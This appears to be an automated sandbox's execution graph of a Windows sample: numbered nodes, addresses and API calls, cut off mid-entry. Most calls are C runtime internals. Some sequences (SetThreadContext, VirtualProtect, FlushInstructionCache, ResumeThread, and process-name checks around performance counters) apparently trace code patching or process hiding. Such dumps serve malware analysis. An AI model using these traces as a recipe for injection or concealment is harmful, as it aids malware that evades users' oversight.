                                                          execution_graph 8370 2d0165e2fac 8371 2d0165e2fd3 8370->8371 8372 2d0165e30a0 8371->8372 8373 2d0165e2ff0 PdhGetCounterInfoW 8371->8373 8373->8372 8374 2d0165e3012 GetProcessHeap HeapAlloc PdhGetCounterInfoW 8373->8374 8375 2d0165e308c GetProcessHeap HeapFree 8374->8375 8376 2d0165e3044 StrCmpW 8374->8376 8375->8372 8376->8375 8377 2d0165e3059 8376->8377 8377->8375 8379 2d0165e3554 StrCmpNW 8377->8379 8380 2d0165e35f6 8379->8380 8381 2d0165e3586 StrStrW 8379->8381 8380->8377 8381->8380 8382 2d0165e359f StrToIntW 8381->8382 8382->8380 8383 2d0165e35c7 8382->8383 8383->8380 8389 2d0165e1934 OpenProcess 8383->8389 8386 2d0165e3c74 StrCmpNIW 8387 2d0165e35e8 8386->8387 8387->8380 8388 2d0165e1c00 2 API calls 8387->8388 8388->8380 8390 2d0165e19ba 8389->8390 8391 2d0165e1968 K32GetModuleFileNameExW 8389->8391 8390->8380 8390->8386 8392 2d0165e1982 PathFindFileNameW lstrlenW 8391->8392 8393 2d0165e19b1 CloseHandle 8391->8393 8392->8393 8394 2d0165e19a0 StrCpyW 8392->8394 8393->8390 8394->8393 8729 2d0165f522d 8730 2d0165ea0c0 __CxxCallCatchBlock 9 API calls 8729->8730 8732 2d0165f5240 8730->8732 8731 2d0165e9a64 _CreateFrameInfo 9 API calls 8733 2d0165f5293 8731->8733 8736 2d0165e9750 __CxxCallCatchBlock 9 API calls 8732->8736 8737 2d0165f527f __CxxCallCatchBlock 8732->8737 8734 2d0165e9a64 _CreateFrameInfo 9 API calls 8733->8734 8735 2d0165f52a3 8734->8735 8736->8737 8737->8731 7706 2d0165ef72c 7707 2d0165ef74e 7706->7707 7708 2d0165ef76b 7706->7708 7707->7708 7709 2d0165ef75c 7707->7709 7710 2d0165ef775 7708->7710 7718 2d0165f1ee8 7708->7718 7715 2d0165edadc 7709->7715 7725 2d0165f1f24 7710->7725 7714 2d0165ef761 _invalid_parameter_noinfo 7737 2d0165ed3d0 GetLastError 7715->7737 7717 2d0165edae5 7717->7714 7719 2d0165f1f0a HeapSize 7718->7719 7720 2d0165f1ef1 7718->7720 7721 2d0165edadc __free_lconv_mon 11 API calls 7720->7721 7722 2d0165f1ef6 7721->7722 7795 2d0165ed9a0 7722->7795 7726 2d0165f1f39 7725->7726 7727 2d0165f1f43 7725->7727 7921 2d0165ece3c 7726->7921 7729 2d0165f1f48 7727->7729 7735 2d0165f1f4f __free_lconv_mon 7727->7735 7730 2d0165edb74 __free_lconv_mon 11 API calls 7729->7730 7733 2d0165f1f41 7730->7733 7731 2d0165f1f55 7734 2d0165edadc __free_lconv_mon 11 API calls 7731->7734 7732 2d0165f1f82 HeapReAlloc 7732->7733 7732->7735 7733->7714 7734->7733 7735->7731 7735->7732 7736 2d0165ebc8c __free_lconv_mon 2 API calls 7735->7736 7736->7735 7738 2d0165ed411 FlsSetValue 7737->7738 7744 2d0165ed3f4 7737->7744 7739 2d0165ed401 SetLastError 7738->7739 7740 2d0165ed423 7738->7740 7739->7717 7754 2d0165edafc 7740->7754 7744->7738 7744->7739 7745 2d0165ed450 FlsSetValue 7748 2d0165ed46e 7745->7748 7749 2d0165ed45c FlsSetValue 7745->7749 7746 2d0165ed440 FlsSetValue 7747 2d0165ed449 7746->7747 7761 2d0165edb74 7747->7761 7767 2d0165ecfc4 7748->7767 7749->7747 7759 2d0165edb0d __free_lconv_mon 7754->7759 7755 2d0165edb5e 7758 2d0165edadc __free_lconv_mon 10 API calls 7755->7758 7756 2d0165edb42 HeapAlloc 7757 2d0165ed432 7756->7757 7756->7759 7757->7745 7757->7746 7758->7757 7759->7755 7759->7756 7772 2d0165ebc8c 7759->7772 7762 2d0165edbaa 7761->7762 7763 2d0165edb79 HeapFree 7761->7763 7762->7739 7763->7762 7764 2d0165edb94 GetLastError 7763->7764 7765 2d0165edba1 __free_lconv_mon 7764->7765 7766 2d0165edadc __free_lconv_mon 9 API calls 7765->7766 7766->7762 7781 2d0165ece9c 7767->7781 7775 2d0165ebccc 7772->7775 7780 2d0165ecdcc EnterCriticalSection 7775->7780 7793 2d0165ecdcc EnterCriticalSection 7781->7793 7798 2d0165ed838 7795->7798 7799 2d0165ed863 7798->7799 7806 2d0165ed8d4 7799->7806 7803 2d0165ed8c2 7803->7710 7804 2d0165ed8ad 7804->7803 7805 2d0165ecbd0 _invalid_parameter_noinfo 28 API calls 7804->7805 7805->7803 7829 2d0165ed61c 7806->7829 7811 2d0165ed88a 7811->7804 7816 2d0165ecbd0 7811->7816 7817 2d0165ecbdf GetLastError 7816->7817 7818 2d0165ecc28 7816->7818 7819 2d0165ecbf4 7817->7819 7818->7804 7820 2d0165ed498 _invalid_parameter_noinfo 14 API calls 7819->7820 7821 2d0165ecc0e SetLastError 7820->7821 7821->7818 7822 2d0165ecc31 7821->7822 7823 2d0165ecbd0 _invalid_parameter_noinfo 26 API calls 7822->7823 7824 2d0165ecc57 7823->7824 7864 2d0165f0860 7824->7864 7830 2d0165ed638 GetLastError 7829->7830 7831 2d0165ed673 7829->7831 7832 2d0165ed648 7830->7832 7831->7811 7835 2d0165ed688 7831->7835 7842 2d0165ed498 7832->7842 7836 2d0165ed6bc 7835->7836 7837 2d0165ed6a4 GetLastError SetLastError 7835->7837 7836->7811 7838 2d0165ed9c0 IsProcessorFeaturePresent 7836->7838 7837->7836 7839 2d0165ed9d3 7838->7839 7856 2d0165ed6d4 7839->7856 7843 2d0165ed4b7 FlsGetValue 7842->7843 7845 2d0165ed4cc 7842->7845 7844 2d0165ed4c4 SetLastError 7843->7844 7843->7845 7844->7831 7845->7844 7846 2d0165edafc __free_lconv_mon 11 API calls 7845->7846 7847 2d0165ed4ee 7846->7847 7848 2d0165ed50c FlsSetValue 7847->7848 7851 2d0165ed4fc 7847->7851 7849 2d0165ed52a 7848->7849 7850 2d0165ed518 FlsSetValue 7848->7850 7852 2d0165ecfc4 __free_lconv_mon 11 API calls 7849->7852 7850->7851 7853 2d0165edb74 __free_lconv_mon 11 API calls 7851->7853 7854 2d0165ed532 7852->7854 7853->7844 7855 2d0165edb74 __free_lconv_mon 11 API calls 7854->7855 7855->7844 7857 2d0165ed70e _invalid_parameter_noinfo 7856->7857 7858 2d0165ed736 RtlCaptureContext RtlLookupFunctionEntry 7857->7858 7859 2d0165ed7a6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7858->7859 7860 2d0165ed770 RtlVirtualUnwind 7858->7860 7861 2d0165ed7f8 _invalid_parameter_noinfo 7859->7861 7860->7859 7862 2d0165e7d70 _log10_special 8 API calls 7861->7862 7863 2d0165ed817 GetCurrentProcess TerminateProcess 7862->7863 7865 2d0165ecc7f 7864->7865 7866 2d0165f0879 7864->7866 7868 2d0165f08cc 7865->7868 7866->7865 7872 2d0165f0e8c 7866->7872 7869 2d0165ecc8f 7868->7869 7870 2d0165f08e5 7868->7870 7869->7804 7870->7869 7918 2d0165ef120 7870->7918 7881 2d0165ed258 GetLastError 7872->7881 7874 2d0165f0e9b 7880 2d0165f0ee1 7874->7880 7917 2d0165ecdcc EnterCriticalSection 7874->7917 7880->7865 7882 2d0165ed27c FlsGetValue 7881->7882 7883 2d0165ed299 FlsSetValue 7881->7883 7884 2d0165ed293 7882->7884 7901 2d0165ed289 7882->7901 7885 2d0165ed2ab 7883->7885 7883->7901 7884->7883 7887 2d0165edafc __free_lconv_mon 11 API calls 7885->7887 7886 2d0165ed305 SetLastError 7888 2d0165ed312 7886->7888 7895 2d0165ed325 7886->7895 7889 2d0165ed2ba 7887->7889 7888->7874 7890 2d0165ed2d8 FlsSetValue 7889->7890 7891 2d0165ed2c8 FlsSetValue 7889->7891 7893 2d0165ed2f6 7890->7893 7894 2d0165ed2e4 FlsSetValue 7890->7894 7892 2d0165ed2d1 7891->7892 7896 2d0165edb74 __free_lconv_mon 11 API calls 7892->7896 7897 2d0165ecfc4 __free_lconv_mon 11 API calls 7893->7897 7894->7892 7898 2d0165ed33d FlsGetValue 7895->7898 7899 2d0165ed358 FlsSetValue 7895->7899 7896->7901 7900 2d0165ed2fe 7897->7900 7902 2d0165ed352 7898->7902 7907 2d0165ed34a 7898->7907 7904 2d0165ed365 7899->7904 7899->7907 7903 2d0165edb74 __free_lconv_mon 11 API calls 7900->7903 7901->7886 7902->7899 7903->7886 7905 2d0165edafc __free_lconv_mon 11 API calls 7904->7905 7906 2d0165ed374 7905->7906 7908 2d0165ed392 FlsSetValue 7906->7908 7909 2d0165ed382 FlsSetValue 7906->7909 7907->7874 7910 2d0165ed39e FlsSetValue 7908->7910 7911 2d0165ed3b0 7908->7911 7912 2d0165ed38b 7909->7912 7910->7912 7913 2d0165ecfc4 __free_lconv_mon 11 API calls 7911->7913 7914 2d0165edb74 __free_lconv_mon 11 API calls 7912->7914 7915 2d0165ed3b8 7913->7915 7914->7907 7915->7907 7916 2d0165edb74 __free_lconv_mon 11 API calls 7915->7916 7916->7907 7919 2d0165ed258 _invalid_parameter_noinfo 23 API calls 7918->7919 7920 2d0165ef129 7919->7920 7922 2d0165ece4b __free_lconv_mon 7921->7922 7923 2d0165ece87 7921->7923 7922->7923 7924 2d0165ece6e HeapAlloc 7922->7924 7927 2d0165ebc8c __free_lconv_mon 2 API calls 7922->7927 7925 2d0165edadc __free_lconv_mon 11 API calls 7923->7925 7924->7922 7926 2d0165ece85 7924->7926 7925->7926 7926->7733 7927->7922 8395 2d0165eb1a8 8396 2d0165eb1d5 __except_validate_context_record 8395->8396 8397 2d0165e9a64 _CreateFrameInfo 9 API calls 8396->8397 8401 2d0165eb1da 8397->8401 8398 2d0165eb234 8400 2d0165eb288 8398->8400 8403 2d0165eb2af 8398->8403 8410 2d0165eb256 __GetCurrentState 8398->8410 8399 2d0165eb2c2 8407 2d0165eb2e1 8399->8407 8431 2d0165ea114 8399->8431 8401->8398 8401->8399 8401->8400 8402 2d0165eb330 8402->8400 8437 2d0165ea974 8402->8437 8424 2d0165e9d10 8403->8424 8407->8400 8407->8402 8434 2d0165ea128 8407->8434 8408 2d0165eb3d9 8410->8408 8412 2d0165eb6b8 8410->8412 8413 2d0165ea114 Is_bad_exception_allowed 9 API calls 8412->8413 8414 2d0165eb6e7 __GetCurrentState 8413->8414 8415 2d0165e9a64 _CreateFrameInfo 9 API calls 8414->8415 8422 2d0165eb704 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8415->8422 8416 2d0165eb7fb 8417 2d0165e9a64 _CreateFrameInfo 9 API calls 8416->8417 8418 2d0165eb800 8417->8418 8419 2d0165eb80b __FrameHandler3::GetHandlerSearchState 8418->8419 8420 2d0165e9a64 _CreateFrameInfo 9 API calls 8418->8420 8419->8400 8420->8419 8421 2d0165ea114 9 API calls Is_bad_exception_allowed 8421->8422 8422->8416 8422->8419 8422->8421 8494 2d0165ea13c 8422->8494 8497 2d0165e9d74 8424->8497 8426 2d0165e9d2f __FrameHandler3::ExecutionInCatch 8501 2d0165e9c80 8426->8501 8429 2d0165eb6b8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8430 2d0165e9d64 8429->8430 8430->8400 8432 2d0165e9a64 _CreateFrameInfo 9 API calls 8431->8432 8433 2d0165ea11d 8432->8433 8433->8407 8435 2d0165e9a64 _CreateFrameInfo 9 API calls 8434->8435 8436 2d0165ea131 8435->8436 8436->8402 8505 2d0165eb844 8437->8505 8439 2d0165eae42 8440 2d0165ead93 8440->8439 8481 2d0165ead91 8440->8481 8558 2d0165eae4c 8440->8558 8441 2d0165eaabb 8441->8440 8466 2d0165eaaf3 8441->8466 8443 2d0165e9a64 _CreateFrameInfo 9 API calls 8447 2d0165eadd5 8443->8447 8444 2d0165eacc4 8449 2d0165eace1 8444->8449 8451 2d0165ea114 Is_bad_exception_allowed 9 API calls 8444->8451 8444->8481 8445 2d0165e9a64 _CreateFrameInfo 9 API calls 8448 2d0165eaa22 8445->8448 8447->8439 8450 2d0165e7d70 _log10_special 8 API calls 8447->8450 8448->8447 8452 2d0165e9a64 _CreateFrameInfo 9 API calls 8448->8452 8456 2d0165ead03 8449->8456 8449->8481 8551 2d0165e9ce4 8449->8551 8453 2d0165eade8 8450->8453 8451->8449 8455 2d0165eaa32 8452->8455 8453->8400 8457 2d0165e9a64 _CreateFrameInfo 9 API calls 8455->8457 8458 2d0165ead19 8456->8458 8456->8481 8491 2d0165eae25 8456->8491 8459 2d0165eaa3b 8457->8459 8460 2d0165ead24 8458->8460 8463 2d0165ea114 Is_bad_exception_allowed 9 API calls 8458->8463 8516 2d0165ea154 8459->8516 8468 2d0165eb8dc 9 API calls 8460->8468 8461 2d0165e9a64 _CreateFrameInfo 9 API calls 8464 2d0165eae2b 8461->8464 8463->8460 8467 2d0165e9a64 _CreateFrameInfo 9 API calls 8464->8467 8466->8444 8470 2d0165ea128 9 API calls 8466->8470 8530 2d0165eb068 8466->8530 8544 2d0165ea8a0 8466->8544 8471 2d0165eae34 8467->8471 8472 2d0165ead3b 8468->8472 8469 2d0165e9a64 _CreateFrameInfo 9 API calls 8473 2d0165eaa7d 8469->8473 8470->8466 8474 2d0165ecad8 23 API calls 8471->8474 8475 2d0165e9d74 __SetUnwindTryBlock RtlLookupFunctionEntry 8472->8475 8472->8481 8473->8441 8477 2d0165e9a64 _CreateFrameInfo 9 API calls 8473->8477 8474->8439 8476 2d0165ead55 8475->8476 8555 2d0165e9f80 RtlUnwindEx 8476->8555 8479 2d0165eaa89 8477->8479 8482 2d0165e9a64 _CreateFrameInfo 9 API calls 8479->8482 8481->8443 8483 2d0165eaa92 8482->8483 8519 2d0165eb8dc 8483->8519 8487 2d0165eaaa6 8526 2d0165eb9cc 8487->8526 8489 2d0165eae1f 8575 2d0165ecad8 8489->8575 8491->8461 8492 2d0165eaaae __CxxCallCatchBlock std::bad_alloc::bad_alloc 8492->8489 8570 2d0165e98d0 8492->8570 8495 2d0165e9a64 _CreateFrameInfo 9 API calls 8494->8495 8496 2d0165ea14a 8495->8496 8496->8422 8500 2d0165e9da2 __FrameHandler3::ExecutionInCatch 8497->8500 8498 2d0165e9dce RtlLookupFunctionEntry 8498->8500 8499 2d0165e9e12 8499->8426 8500->8498 8500->8499 8502 2d0165e9c9e 8501->8502 8503 2d0165e9ccb 8502->8503 8504 2d0165e9a64 _CreateFrameInfo 9 API calls 8502->8504 8503->8429 8504->8502 8506 2d0165eb869 __FrameHandler3::ExecutionInCatch 8505->8506 8507 2d0165e9d74 __SetUnwindTryBlock RtlLookupFunctionEntry 8506->8507 8508 2d0165eb87e 8507->8508 8578 2d0165ea4fc 8508->8578 8511 2d0165eb8b3 8513 2d0165ea4fc __GetUnwindTryBlock RtlLookupFunctionEntry 8511->8513 8512 2d0165eb890 __FrameHandler3::GetHandlerSearchState 8581 2d0165ea534 8512->8581 8515 2d0165ea9d6 8513->8515 8515->8439 8515->8441 8515->8445 8517 2d0165e9a64 _CreateFrameInfo 9 API calls 8516->8517 8518 2d0165ea162 8517->8518 8518->8439 8518->8469 8520 2d0165eb9c3 8519->8520 8523 2d0165eb907 8519->8523 8521 2d0165eaaa2 8521->8441 8521->8487 8522 2d0165ea128 9 API calls 8522->8523 8523->8521 8523->8522 8524 2d0165ea114 Is_bad_exception_allowed 9 API calls 8523->8524 8525 2d0165eb068 9 API calls 8523->8525 8524->8523 8525->8523 8527 2d0165eba39 8526->8527 8529 2d0165eb9e9 Is_bad_exception_allowed 8526->8529 8527->8492 8528 2d0165ea114 9 API calls Is_bad_exception_allowed 8528->8529 8529->8527 8529->8528 8531 2d0165eb124 8530->8531 8532 2d0165eb095 8530->8532 8531->8466 8533 2d0165ea114 Is_bad_exception_allowed 9 API calls 8532->8533 8534 2d0165eb09e 8533->8534 8534->8531 8535 2d0165ea114 Is_bad_exception_allowed 9 API calls 8534->8535 8536 2d0165eb0b7 8534->8536 8535->8536 8536->8531 8537 2d0165eb0e3 8536->8537 8538 2d0165ea114 Is_bad_exception_allowed 9 API calls 8536->8538 8539 2d0165ea128 9 API calls 8537->8539 8538->8537 8540 2d0165eb0f7 8539->8540 8540->8531 8541 2d0165eb110 8540->8541 8542 2d0165ea114 Is_bad_exception_allowed 9 API calls 8540->8542 8543 2d0165ea128 9 API calls 8541->8543 8542->8541 8543->8531 8545 2d0165e9d74 __SetUnwindTryBlock RtlLookupFunctionEntry 8544->8545 8546 2d0165ea8dd 8545->8546 8547 2d0165ea114 Is_bad_exception_allowed 9 API calls 8546->8547 8548 2d0165ea915 8547->8548 8549 2d0165e9f80 9 API calls 8548->8549 8550 2d0165ea959 8549->8550 8550->8466 8552 2d0165e9cf8 __FrameHandler3::ExecutionInCatch 8551->8552 8553 2d0165e9c80 __FrameHandler3::ExecutionInCatch 9 API calls 8552->8553 8554 2d0165e9d02 8553->8554 8554->8456 8556 2d0165e7d70 _log10_special 8 API calls 8555->8556 8557 2d0165ea07a 8556->8557 8557->8481 8559 2d0165eae82 8558->8559 8566 2d0165eaef0 8558->8566 8560 2d0165e9a64 _CreateFrameInfo 9 API calls 8559->8560 8561 2d0165eae87 8560->8561 8562 2d0165eae96 EncodePointer 8561->8562 8569 2d0165eaeec 8561->8569 8563 2d0165e9a64 _CreateFrameInfo 9 API calls 8562->8563 8564 2d0165eaea6 8563->8564 8564->8569 8584 2d0165e9c2c 8564->8584 8566->8481 8567 2d0165ea114 9 API calls Is_bad_exception_allowed 8567->8569 8568 2d0165ea8a0 19 API calls 8568->8569 8569->8566 8569->8567 8569->8568 8571 2d0165e98ef 8570->8571 8572 2d0165e993a RaiseException 8571->8572 8573 2d0165e9918 RtlPcToFileHeader 8571->8573 8572->8489 8574 2d0165e9930 8573->8574 8574->8572 8576 2d0165ed258 _invalid_parameter_noinfo 23 API calls 8575->8576 8577 2d0165ecae1 8576->8577 8579 2d0165e9d74 __SetUnwindTryBlock RtlLookupFunctionEntry 8578->8579 8580 2d0165ea50f 8579->8580 8580->8511 8580->8512 8582 2d0165e9d74 __SetUnwindTryBlock RtlLookupFunctionEntry 8581->8582 8583 2d0165ea54e 8582->8583 8583->8515 8585 2d0165e9a64 _CreateFrameInfo 9 API calls 8584->8585 8586 2d0165e9c58 8585->8586 8586->8569 7658 2d0165e6120 7659 2d0165e612d 7658->7659 7660 2d0165e6139 7659->7660 7662 2d0165e624a 7659->7662 7661 2d0165e616e 7660->7661 7663 2d0165e61bd 7660->7663 7664 2d0165e6196 SetThreadContext 7661->7664 7665 2d0165e6271 VirtualProtect FlushInstructionCache 7662->7665 7667 2d0165e632e 7662->7667 7664->7663 7665->7662 7666 2d0165e634e 7676 2d0165e5220 GetCurrentProcess 7666->7676 7667->7666 7680 2d0165e4810 7667->7680 7669 2d0165e6353 7671 2d0165e63a7 7669->7671 7672 2d0165e6367 ResumeThread 7669->7672 7684 2d0165e7d70 7671->7684 7673 2d0165e639b 7672->7673 7673->7669 7677 2d0165e523c 7676->7677 7678 2d0165e5252 VirtualProtect FlushInstructionCache 7677->7678 7679 2d0165e5283 7677->7679 7678->7677 7679->7669 7681 2d0165e482c 7680->7681 7682 2d0165e488f 7681->7682 7683 2d0165e4842 VirtualFree 7681->7683 7682->7666 7683->7681 7686 2d0165e7d79 7684->7686 7685 2d0165e63ef 7686->7685 7687 2d0165e855c IsProcessorFeaturePresent 7686->7687 7688 2d0165e8574 7687->7688 7693 2d0165e8750 RtlCaptureContext 7688->7693 7694 2d0165e876a RtlLookupFunctionEntry 7693->7694 7695 2d0165e8587 7694->7695 7696 2d0165e8780 RtlVirtualUnwind 7694->7696 7697 2d0165e8528 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7695->7697 7696->7694 7696->7695 8587 2d0165ebfa1 8588 2d0165ecad8 23 API calls 8587->8588 8589 2d0165ebfa6 8588->8589 8590 2d0165ebfcd GetModuleHandleW 8589->8590 8591 2d0165ec017 8589->8591 8590->8591 8592 2d0165ebfda 8590->8592 8604 2d0165ebea4 8591->8604 8592->8591 8599 2d0165ec0c8 GetModuleHandleExW 8592->8599 8600 2d0165ec0fc GetProcAddress 8599->8600 8601 2d0165ec10e 8599->8601 8600->8601 8602 2d0165ec12a FreeLibrary 8601->8602 8603 2d0165ec131 8601->8603 8602->8603 8603->8591 8618 2d0165ecdcc EnterCriticalSection 8604->8618 8738 2d0165f0020 8741 2d0165effd8 8738->8741 8746 2d0165ecdcc EnterCriticalSection 8741->8746 7939 2d0165e211c 7940 2d0165e214d 7939->7940 7941 2d0165e2263 7940->7941 7948 2d0165e2171 7940->7948 7949 2d0165e222e 7940->7949 7942 2d0165e2268 7941->7942 7943 2d0165e22d7 7941->7943 7956 2d0165e31cc GetProcessHeap HeapAlloc 7942->7956 7946 2d0165e31cc 11 API calls 7943->7946 7943->7949 7945 2d0165e21a9 StrCmpNIW 7945->7948 7946->7949 7948->7945 7948->7949 7950 2d0165e1c34 7948->7950 7951 2d0165e1c5b GetProcessHeap HeapAlloc 7950->7951 7952 2d0165e1cb8 7950->7952 7951->7952 7953 2d0165e1c96 7951->7953 7952->7948 7962 2d0165e1c00 7953->7962 7960 2d0165e321f 7956->7960 7957 2d0165e32dd GetProcessHeap HeapFree 7957->7949 7958 2d0165e32d8 7958->7957 7959 2d0165e326a StrCmpNIW 7959->7960 7960->7957 7960->7958 7960->7959 7961 2d0165e1c34 6 API calls 7960->7961 7961->7960 7963 2d0165e1c20 GetProcessHeap HeapFree 7962->7963 7964 2d0165e1c17 7962->7964 7963->7952 7965 2d0165e152c 2 API calls 7964->7965 7965->7963 8747 2d0165efc1c 8748 2d0165efc55 8747->8748 8750 2d0165efc26 8747->8750 8749 2d0165efc3b FreeLibrary 8749->8750 8750->8748 8750->8749 8927 2d0165f0698 8928 2d0165f06c2 8927->8928 8929 2d0165edafc __free_lconv_mon 11 API calls 8928->8929 8930 2d0165f06e1 8929->8930 8931 2d0165edb74 __free_lconv_mon 11 API calls 8930->8931 8932 2d0165f06ef 8931->8932 8933 2d0165edafc __free_lconv_mon 11 API calls 8932->8933 8936 2d0165f0719 8932->8936 8935 2d0165f070b 8933->8935 8934 2d0165efa3c 6 API calls 8934->8936 8937 2d0165edb74 __free_lconv_mon 11 API calls 8935->8937 8936->8934 8938 2d0165f0722 8936->8938 8937->8936 8629 2d0165f5395 8630 2d0165f53a4 8629->8630 8632 2d0165f53ae 8629->8632 8633 2d0165ece20 LeaveCriticalSection 8630->8633 7966 2d0165ec514 7967 2d0165ec52d 7966->7967 7980 2d0165ec529 7966->7980 7981 2d0165ef0c0 7967->7981 7972 2d0165ec53f 7974 2d0165edb74 __free_lconv_mon 11 API calls 7972->7974 7973 2d0165ec54b 8007 2d0165ec588 7973->8007 7974->7980 7977 2d0165edb74 __free_lconv_mon 11 API calls 7978 2d0165ec572 7977->7978 7979 2d0165edb74 __free_lconv_mon 11 API calls 7978->7979 7979->7980 7982 2d0165ef0cd 7981->7982 7983 2d0165ec532 7981->7983 8026 2d0165ed32c 7982->8026 7987 2d0165ef61c GetEnvironmentStringsW 7983->7987 7985 2d0165ef0fc 8043 2d0165eed98 7985->8043 7988 2d0165ec537 7987->7988 7990 2d0165ef64c 7987->7990 7988->7972 7988->7973 7989 2d0165ef53c WideCharToMultiByte 7991 2d0165ef69d 7989->7991 7990->7989 7992 2d0165ef6a4 FreeEnvironmentStringsW 7991->7992 7993 2d0165ece3c 12 API calls 7991->7993 7992->7988 7994 2d0165ef6b7 7993->7994 7995 2d0165ef6bf 7994->7995 7996 2d0165ef6c8 7994->7996 7997 2d0165edb74 __free_lconv_mon 11 API calls 7995->7997 7998 2d0165ef53c WideCharToMultiByte 7996->7998 7999 2d0165ef6c6 7997->7999 8000 2d0165ef6eb 7998->8000 7999->7992 8001 2d0165ef6ef 8000->8001 8002 2d0165ef6f9 8000->8002 8003 2d0165edb74 __free_lconv_mon 11 API calls 8001->8003 8004 2d0165edb74 __free_lconv_mon 11 API calls 8002->8004 8005 2d0165ef6f7 FreeEnvironmentStringsW 8003->8005 8004->8005 8005->7988 8008 2d0165ec5ad 8007->8008 8009 2d0165edafc __free_lconv_mon 11 API calls 8008->8009 8019 2d0165ec5e3 8009->8019 8010 2d0165edb74 __free_lconv_mon 11 API calls 8011 2d0165ec553 8010->8011 8011->7977 8012 2d0165ec65e 8013 2d0165edb74 __free_lconv_mon 11 API calls 8012->8013 8013->8011 8014 2d0165edafc __free_lconv_mon 11 API calls 8014->8019 8015 2d0165ec64d 8224 2d0165ec698 8015->8224 8019->8012 8019->8014 8019->8015 8020 2d0165ec683 8019->8020 8023 2d0165edb74 __free_lconv_mon 11 API calls 8019->8023 8024 2d0165ec5eb 8019->8024 8215 2d0165ecb18 8019->8215 8022 2d0165ed9c0 _invalid_parameter_noinfo 17 API calls 8020->8022 8021 2d0165edb74 __free_lconv_mon 11 API calls 8021->8024 8025 2d0165ec696 8022->8025 8023->8019 8024->8010 8027 2d0165ed33d FlsGetValue 8026->8027 8028 2d0165ed358 FlsSetValue 8026->8028 8029 2d0165ed352 8027->8029 8033 2d0165ed34a 8027->8033 8030 2d0165ed365 8028->8030 8028->8033 8029->8028 8031 2d0165edafc __free_lconv_mon 11 API calls 8030->8031 8032 2d0165ed374 8031->8032 8034 2d0165ed392 FlsSetValue 8032->8034 8035 2d0165ed382 FlsSetValue 8032->8035 8033->7985 8036 2d0165ed39e FlsSetValue 8034->8036 8037 2d0165ed3b0 8034->8037 8038 2d0165ed38b 8035->8038 8036->8038 8039 2d0165ecfc4 __free_lconv_mon 11 API calls 8037->8039 8040 2d0165edb74 __free_lconv_mon 11 API calls 8038->8040 8041 2d0165ed3b8 8039->8041 8040->8033 8041->8033 8042 2d0165edb74 __free_lconv_mon 11 API calls 8041->8042 8042->8033 8066 2d0165ef008 8043->8066 8048 2d0165ece3c 12 API calls 8049 2d0165eedfb 8048->8049 8050 2d0165eee03 8049->8050 8052 2d0165eee12 8049->8052 8051 2d0165edb74 __free_lconv_mon 11 API calls 8050->8051 8065 2d0165eedea 8051->8065 8052->8052 8085 2d0165ef13c 8052->8085 8055 2d0165eef0e 8056 2d0165edadc __free_lconv_mon 11 API calls 8055->8056 8058 2d0165eef13 8056->8058 8057 2d0165eef69 8064 2d0165eefd0 8057->8064 8096 2d0165ee8c8 8057->8096 8060 2d0165edb74 __free_lconv_mon 11 API calls 8058->8060 8059 2d0165eef28 8059->8057 8061 2d0165edb74 __free_lconv_mon 11 API calls 8059->8061 8060->8065 8061->8057 8063 2d0165edb74 __free_lconv_mon 11 API calls 8063->8065 8064->8063 8065->7983 8067 2d0165ef02b 8066->8067 8071 2d0165ef035 8067->8071 8111 2d0165ecdcc EnterCriticalSection 8067->8111 8073 2d0165eedcd 8071->8073 8075 2d0165ed32c 16 API calls 8071->8075 8078 2d0165eea98 8073->8078 8076 2d0165ef0fc 8075->8076 8077 2d0165eed98 69 API calls 8076->8077 8077->8073 8112 2d0165ee5e4 8078->8112 8081 2d0165eeaca 8083 2d0165eeacf GetACP 8081->8083 8084 2d0165eeadf 8081->8084 8082 2d0165eeab8 GetOEMCP 8082->8084 8083->8084 8084->8048 8084->8065 8086 2d0165eea98 25 API calls 8085->8086 8087 2d0165ef169 8086->8087 8088 2d0165ef2bf 8087->8088 8090 2d0165ef1a6 IsValidCodePage 8087->8090 8095 2d0165ef1c0 _invalid_parameter_noinfo 8087->8095 8089 2d0165e7d70 _log10_special 8 API calls 8088->8089 8092 2d0165eef05 8089->8092 8090->8088 8091 2d0165ef1b7 8090->8091 8093 2d0165ef1e6 GetCPInfo 8091->8093 8091->8095 8092->8055 8092->8059 8093->8088 8093->8095 8128 2d0165eebb0 8095->8128 8214 2d0165ecdcc EnterCriticalSection 8096->8214 8113 2d0165ee608 8112->8113 8114 2d0165ee603 8112->8114 8113->8114 8115 2d0165ed258 _invalid_parameter_noinfo 23 API calls 8113->8115 8114->8081 8114->8082 8116 2d0165ee623 8115->8116 8120 2d0165f082c 8116->8120 8121 2d0165ee646 8120->8121 8122 2d0165f0841 8120->8122 8124 2d0165f0898 8121->8124 8122->8121 8123 2d0165f0e8c _invalid_parameter_noinfo 23 API calls 8122->8123 8123->8121 8125 2d0165f08ad 8124->8125 8126 2d0165f08c0 8124->8126 8125->8126 8127 2d0165ef120 _invalid_parameter_noinfo 23 API calls 8125->8127 8126->8114 8127->8126 8129 2d0165eebed GetCPInfo 8128->8129 8130 2d0165eece3 8128->8130 8129->8130 8136 2d0165eec00 8129->8136 8131 2d0165e7d70 _log10_special 8 API calls 8130->8131 8132 2d0165eed82 8131->8132 8132->8088 8139 2d0165f1974 8136->8139 8140 2d0165ee5e4 23 API calls 8139->8140 8141 2d0165f19b6 8140->8141 8159 2d0165ef4ac 8141->8159 8161 2d0165ef4b5 MultiByteToWideChar 8159->8161 8216 2d0165ecb25 8215->8216 8218 2d0165ecb2f 8215->8218 8216->8218 8222 2d0165ecb4a 8216->8222 8217 2d0165edadc __free_lconv_mon 11 API calls 8219 2d0165ecb36 8217->8219 8218->8217 8220 2d0165ed9a0 _invalid_parameter_noinfo 49 API calls 8219->8220 8221 2d0165ecb42 8220->8221 8221->8019 8222->8221 8223 2d0165edadc __free_lconv_mon 11 API calls 8222->8223 8223->8219 8225 2d0165ec69d 8224->8225 8226 2d0165ec655 8224->8226 8227 2d0165ec6c6 8225->8227 8228 2d0165edb74 __free_lconv_mon 11 API calls 8225->8228 8226->8021 8229 2d0165edb74 __free_lconv_mon 11 API calls 8227->8229 8228->8225 8229->8226 8939 2d0165ed094 8940 2d0165ed099 8939->8940 8941 2d0165ed0ae 8939->8941 8945 2d0165ed0b4 8940->8945 8946 2d0165ed0f6 8945->8946 8947 2d0165ed0fe 8945->8947 8948 2d0165edb74 __free_lconv_mon 11 API 